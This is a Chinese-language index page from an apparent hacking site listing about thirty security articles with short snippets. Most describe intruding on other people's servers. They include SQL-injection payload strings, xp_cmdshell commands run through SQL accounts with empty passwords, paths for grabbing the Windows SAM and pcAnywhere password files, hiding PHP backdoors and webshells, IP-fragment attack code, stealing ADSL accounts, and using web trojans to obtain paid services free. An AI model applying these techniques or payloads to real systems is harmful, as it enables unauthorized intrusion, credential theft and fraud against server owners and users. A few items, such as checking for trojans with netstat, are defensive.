- 如何挖掘ASP程序漏洞
- 作者:宿心劫 火狐技术联盟见习成员 最近小组的人都在拼命的看源码找漏洞,我也没闲着,就随便下载了个东西看看。 打开仿阿里巴巴的电子购物系统 Access版(老版本了,但仍居下载榜首),在Admin文件夹下找到了login.ASP和passWord.asp两个文件,代码写的很差,这是给我的第一个感觉。以下是我摘出来的敏感代码 login.asp:
- 分类:网络安全
- 简单关机重启注销及惊涛本地开3389源码
- 简单关机重启注销代码 /////////////////////////////// program shut; {$APPTYPE CONSOLE} uses windows; procedure ShowHelp; begin WriteLn(=========== Shut or Reboot Commputer by hnxyy! ============); WriteLn(); WriteLn(用法:+ParamStr(0)+ -s/-S or -r/-R or -o/-O); WriteLn(); WriteLn(说明:); WriteLn();
- 分类:网络安全
- PHP下实现端口复用/劫持
- 作者:Darkness www.bugkidz.org 经常看到有朋友问端口复用,我花了一个晚上写了一点代码 本来想做成嗅叹转发的,无奈单线程的东西很局限,而且始终只能得到头行数据。我想要做成那样的,对于高手来说,不是困难的事。 如果你不懂如何配置,请参照我以前的文章《PHP-SOCKETS初步接触》。WIN下只要有GUEST权限即可用,而且通
- 分类:网络安全
- php后门隐藏技巧
- 现在的webshell是越来越流行了,连PHP的后门也追上来了,主要的有angel的phpspy和lanker的一句话后门!所以现在最主要的是怎么隐蔽我们的后门,想必看完我的文章大家都有自己各自的想法了。 其实lanker的一句话后门确实很强大,但是要用户使用客户端的话会带来一些不必要的麻烦,虽然可以使程序没有记录,(POST没记录的哦
- 分类:网络安全
- 旁注终结篇
- 旁注入侵手法 旁注是最近网络上比较流行的一种入侵方法,在字面上解释就是-“从旁注入”,利用同一主机上面不同网站的漏洞得到webshell,从而利用主机上的程序或者是服务所暴露的用户所在的物理路径进行入侵。以本人对于旁注入侵的理解来说,旁注入侵绝对需要权限的提升作为帮助,如果主机的设置是IIS单用户权限/禁止运行
- 分类:网络安全
- 入侵八大法
- 我们平常所用的远程共用一个桌面的服务软件有DameWare NT ,VNC , Pcanywhere , Remote administrator 等。 DameWare 我感觉已经被淘汰了, 它的缺点太多,例如要依赖IPC$,日志记录等等。Pcanywhere 我没有研究过。VNC 最大的特点是跨平台,但缺点是隐藏图标的问题,我不会编程,当然无法去除图标,还有就是 VNC 功能很少。
- 分类:网络安全
- SQL开3389入侵实例记录
- 把一次从SQL开3389的记录过程发出来,望对新手有用 注://为注释 实例过程: 连接到主机:202.xxx.xxx.xxx //大家可以用sql连接器连上有空口令的sql肉机 命令:XP_cmdshell type c:\boot.ini // 输入命令,看系统,server版的才能 开3389 执行成功,结果: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(
- 分类:网络安全
- 浅谈提升asp木马权限[续]--IIS下完美的图片后门
- 作者:Linzi[F.L.Y] 来源:www.71345.com 网络上传统的提升ASP权限为系统的有两种: 1.图形化下的,把默认站点----主目录---应用程序保护设置为低,这样就可以把asp权限设置为system. 但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天 我要谈的关于adsutil.vbs提升权限. 2.用adsutil.
- 分类:网络安全
- 我是这样走进韩国肉鸡的
- 由于最近要破解一个文件迫切需要一台高速肉鸡用,所以想找个现成的,发现很多论坛发布sql肉鸡,不过经过我测试(利用sqltools上传程序,提示成功,但就是找不到文件)很多都不能用,可能对方的杀毒软件把你的给杀了,也可能是对方的磁盘不允许修改,帐户权限低,下 面我们换一种思路来走进sql主机。 为了找到一台合适的肉鸡,
- 分类:网络安全
- 通过Mysql入侵服务器
- 用nmap扫描了一下abc.target.net,发现开的端口挺多的,看来没有安装防火墙或做TCP/IP过滤。从IIS版本判断是windows 2000的服务器。IIS没什么好利用的,一看开了3306端口,是mysql的,就用我的mysql客户端尝试连接了一下,root的密码竟然为空,后来就觉得没有多大意思,于是把目标转到www.target.net,他们的主站,哈哈。 O
- 分类:网络安全
- IP碎片攻击源代码
- /*** ROSE attack (variation 2) (chUCk (at) lemure.net) Discovered by: gandalf (at) digital.net code modified from large IGMP attack by: Kox by Coolio (coolio (at) k-r4d.com) Sends out small IP fragments totalling up to a large ICMP packet. Then repeatedly sends last IP Fragment forcing reassembly co
- 分类:网络安全
- 对win2k以上“隐藏虚拟目录”再分析
- 一、重述一下隐藏的步骤: 1、在指定网站http://127.0.0.1的实际目录(如f:\web\)下创建一个目录,如coolersky; 2、打开iis管理器,在coolersky目录下创建虚拟目录,如cool,指向位置为f:\cool\; 3、删除创建的coolersky目录; 这样,在iis管理器中无法看到虚拟目录cool,却可以通过http://127.0.0.1/coolersky/cool/来
- 分类:网络安全
- 利用对方服务器漏洞远程注册DLL
- 其实,我们在ASP中,是有捷径远程注册DLL的,但需要对方服务器漏洞的配合(什么漏洞?我可什么都没说啊,自己看)。试试下面的代码,或许侥幸成功呢: % Response.Buffer = True % % Server.ScriptTimeout = 500 Dim frmFolderPath, frmFilePath frmFolderPath = Request.Form(frmFolderPath) frmFilePath = Request.Form(f
- 分类:网络安全
- 提升(web)权限终极9技巧
- 转自:重庆网安联盟 当我们取得一个webshell时候,下一部要做的就是提升权限 个人总结如下: 1.C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆 2.C:\WINNT\system32\config\ 进这里下它的SAM,破解用户
- 分类:网络安全
- 不花钱拿IT认证
- 参加IT认证考试前,笔者习惯到网上去搜搜。乱逛之余,不小心就来到了PROMETRIC的中文站。笔者发现整个站点都是ASP程序,况且刚才还有个考场的登录界面,要是能发现什么漏洞就好了。 探测漏洞 随手找了个页面(http://www.promet ric.com.cn/openpage.asp?page_id=0),在参数0后面加上个单引号。返回的页面显示:
- 分类:网络安全
- MolyX Board原代码泄露漏洞
- 前言 MolyX Board(以下简称MXB)是 MolyX Studios 小组(好象就是CNVBB小组)开发的PHP论坛程序,MXB 融合了众多论坛程序的优点,博采众长,功能强大。多年的论坛程序汉化和改进经验也使 MXB 更适合国人的使用习惯。不过漏洞是难免的。 受影响系统 MolyX Board 2.0 MolyX Board 2.1 详细 attachment.php缺乏对attach变量进
- 分类:网络安全
- 用命令检查电脑是否被安装木马
- 一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。 检测网络连接 如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat -an这个
- 分类:网络安全
- TCP端口的作用、漏洞和操作建议
- 在上网的时候,我们经常会看到“端口”这个词,也会经常用到端口号,比如在FTP地址后面增加的“21”,21就表示端口号。那么端口到底是什么意思呢?怎样查看端口号呢?一个端口是否成为网络恶意攻击的大门呢?,我们应该如何面对形形色色的端口呢?下面就将介绍这方面的内容,以供大家参考。 21端口:21端口主要用于FTP(Fi
- 分类:网络安全
- 修改MD5加密 提高网站安全
- 特别说明:此种改变只能用于在刚开始建站时才可,如果你中途改变的话就会出现问题。 也许提到MD5时大家都很熟,但你真的是这样吗?了解其是如何进行散列的实际过程吗?虽然我们一般的人是不用这样去寻根问底,要用的时候直接去下载别人已编好的程序用就得了。 由于算法大多的人都是知道的,所以现在网上有很多破解MD5散列值
- 分类:网络安全
- Discuz! 2.5F cookie未过滤漏洞
- 漏洞提供:火狐技术联盟-我非我 [www.wrsky.com] 漏洞说明: Discuz! 2.5F新版论坛 COOKIE未过滤 通过本地构造可获取管理员权限 具体描述: 文件include\common.PHP中87行 =================================code begin========================================================== $discuz_uid = $_COOKIE[_discuz_uid];
- 分类:网络安全
- ADSL入侵
- 这是一位所谓的"黑客"的口述,你不妨看一下,也许你看完后对他的技术性做法不是完全明白,但是你肯定会感到一身冷汗,因为我们现在使用ADSL已经日益广泛,但我们的安全意识还不是很强.听完他的口述希望大家在日后能加强安全防范! 口述: 也许看烂了网上已有的常规黑客攻击手段,对一些陈旧的入侵手法早已厌烦,近来我对
- 分类:网络安全
- 黑客常用术语
- 木马 全称为特洛伊木马(Trojan Horse)。“特洛伊木马”这一词最早出现在希腊神话传说中。相传在3000年前,在一次希腊战争中。麦尼劳斯派兵讨伐特洛伊王国,但久攻不下。他们想出一个主意,首先他们假装被打败然后留下一个大木马,。而木马里面却藏着最强悍的勇士!最后等时间一到木马里的勇士冲出来把敌人打败了。这就是后
- 分类:网络安全
- 免费拥有网易收费服务
- 网易的各种收费服务(VIP信箱,个人空间等)都是需要MONEY的 如何让我们不掏MONEY就能拥有这一切呢?看我的。 准备工具:动鲨网页木马生成器 密码解霸破解版 用密码解霸生成木马后传到自己的免费空间,建议使用www.533.net 动鲨网页木马生成的网页放到91i.net中去,申请两个空间一个是放EXE的, 一个是放ASP木马网页的,由
- 分类:网络安全
- 识别WEB应用组件
- 在WEB入侵的过程中,识别WEB系统由为重要,下面介绍常用的一些方法和技巧。 一、用HTTP报头判断 最常用的方法是来发送简单的HTTP HEAD 或 GET 请求来获得HTTP报头,比如:APACHE 的服务器的HTTP头形式如下 D:\tools\ncnc www.ph4nt0m.org 80 GET / HTTP/1.1 HTTP/1.1 400 Bad Request Date: Thu, 04 Nov 2004 05:15:45 GMT
- 分类:网络安全
- 在肉机上开个隐藏的个人主页
- 一般情况下,如果在肉鸡上开主页的话,只要管理员查看一下iis管理器程序, 就会发现我们的主页,这样不但我们的主页暴露了,还可能会被管理员把我 们给踢出去。今天我教大家一个方法是让管理员在iis管理器里发现不了方法。 首先打开肉机(本例中以自己的机器为例)iis管理器,选定一个文件夹, 然后点击右键,选择“资源管
- 分类:网络安全
- 一次艰苦的6个小时的渗透过程
- 作者:kEvin1986 来源:hididi.net/public/Kevin 这些天总觉得闷的慌,想到自己很久很久没有在实战中练习渗透了。于是到网上随便找了一个站点,深吸一口气:渗透开始了。 一边拿着SUPERSCAN扫描端口,一边在站点上转转,发现几个SQL注入的漏洞,是MSSQL的数据库却是都无法成功,大概是ASP的写法和我所使用的注入语句不一样
- 分类:网络安全
- 一种很奇特的入侵主机的方法
- Once upon a time,我发现了一个网站,于是常规入侵。很好,它的FINGER开着,于是我编了一个SHELL,从aaa帐号试到zzz(bye the way,这是我发现的一个网上规律,那就是帐号的长度与口令的强度成正比,如果一个帐号只有两三位长,那它的口令一般也很简单,反之亦然,故且称之为若氏定理吧),结果一个帐号也不存在,我没有再
- 分类:网络安全
- 远程盗ADSL帐号全揭露
- screen.width-300)this.width=screen.width-300' border='0' alt='Click to Open in New Window'> 第1页:密码被盗 ADSL路由拨号惹的祸 本文中揭露了黑客攻击ADSL用户,窃取用户名密码的常见方法,读者请勿将其用于不法用途,并提醒所有与此漏洞相关的用户尽快采取措施进行防范。 ADSL作为一种宽带接入方式已经被广大用户接
- 分类:网络安全
- vbulletin 3.0.x PHP代码执行漏洞
- Vulnerable Systems: ---------------- vBulletin version 3.0 up to and including version 3.0.4 Immune systems: ---------------- vBulletin version 3.0.5 vBulletin version 3.0.6 Vulnerable code in forumdisplay.PHP : ############################################################# if ($vboptions[showforumus
- 分类:网络安全
- PHP注射天书
- PHP注射库 or 1=1 or 1=1 /* %23 and passWord=mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=1 and password=mypass userid=1 and mid(password,3,1)=char(112) us
- 分类:网络安全